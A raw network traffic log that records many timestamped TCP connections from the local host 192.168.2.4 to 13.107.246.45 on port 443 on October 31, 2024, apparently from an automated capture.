                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308593988 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308617115 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308629990 CET51507443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.308635950 CET4435150713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.311351061 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.311404943 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.311470985 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.311650991 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.311667919 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.727472067 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.728032112 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.728049040 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.728512049 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.728518963 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.737092972 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.737916946 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738092899 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738107920 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738198996 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738209009 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738539934 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738545895 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738614082 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.738619089 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868415117 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868447065 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868500948 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868520975 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868546009 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868588924 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868613005 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868658066 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868665934 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868707895 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868891954 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868907928 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868967056 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868983030 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868987083 CET51508443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.868997097 CET4435150813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.869003057 CET51509443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.869019032 CET4435150913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.872035027 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.872070074 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.872145891 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.873307943 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.873337030 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.873404026 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.873475075 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.873495102 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.874129057 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.874142885 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.969872952 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.969902039 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.969923973 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970052004 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970067024 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970105886 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970105886 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970563889 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970637083 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970650911 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970662117 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970706940 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970722914 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970736027 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970736027 CET51510443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970742941 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.970750093 CET4435151013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.974004984 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.974061966 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.974138975 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.974299908 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:50.974322081 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.039433002 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.039980888 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.039993048 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.040498018 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.040504932 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.054491043 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.054985046 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.055022001 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.055515051 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.055521965 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172549963 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172606945 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172732115 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172746897 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172794104 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.172862053 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.173127890 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.173129082 CET51511443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.173151970 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.173161030 CET4435151113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.176192999 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.176244020 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.176323891 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.176500082 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.176507950 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306668997 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306699038 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306723118 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306788921 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306818008 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306833982 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.306869030 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426347017 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426383018 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426440001 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426470995 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426487923 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426490068 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426515102 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426544905 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426738977 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426754951 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426784039 CET51512443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.426789999 CET4435151213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.430074930 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.430121899 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.430188894 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.430363894 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.430380106 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.607423067 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.607992887 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.608021975 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.608496904 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.608504057 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.618550062 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.618912935 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.618949890 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.619318008 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.619323969 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.728018045 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.728657007 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.728693962 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.729146004 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.729152918 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.736763954 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.736785889 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.736840963 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.736844063 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.736897945 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.737107992 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.737127066 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.737138987 CET51513443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.737143993 CET4435151313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.740242004 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.740278006 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.740356922 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.740509987 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.740523100 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752126932 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752156019 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752213955 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752226114 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752260923 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752434015 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752450943 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752466917 CET51514443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.752473116 CET4435151413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.754720926 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.754755974 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.754832029 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.754959106 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.754973888 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.860848904 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.860929966 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.860985041 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.861177921 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.861200094 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.861217022 CET51515443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.861223936 CET4435151513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.864377022 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.864413977 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.864484072 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.864690065 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.864705086 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.919859886 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.920469046 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.920500994 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.920965910 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:51.920972109 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.051614046 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.051721096 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.051780939 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.052179098 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.052194118 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.052215099 CET51516443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.052227020 CET4435151613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.056016922 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.056046009 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.056109905 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.058697939 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.058710098 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.158658981 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.159400940 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.159423113 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.159884930 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.159890890 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.296722889 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297130108 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297205925 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297324896 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297347069 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297363043 CET51517443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.297369957 CET4435151713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.300549984 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.300574064 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.300638914 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.300786018 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.300801992 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.502476931 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.503118038 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.503140926 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.503669024 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.503680944 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.520891905 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.521277905 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.521300077 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.521888018 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.521892071 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.615036011 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.615509987 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.615549088 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.615992069 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.615997076 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634206057 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634279013 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634377003 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634598017 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634610891 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634622097 CET51518443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.634627104 CET4435151813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.637310028 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.637320042 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.637389898 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.637515068 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.637526035 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656306982 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656337023 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656379938 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656400919 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656430006 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656559944 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656579018 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656589985 CET51519443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.656594992 CET4435151913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750461102 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750531912 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750591993 CET51520443192.168.2.413.107.246.45
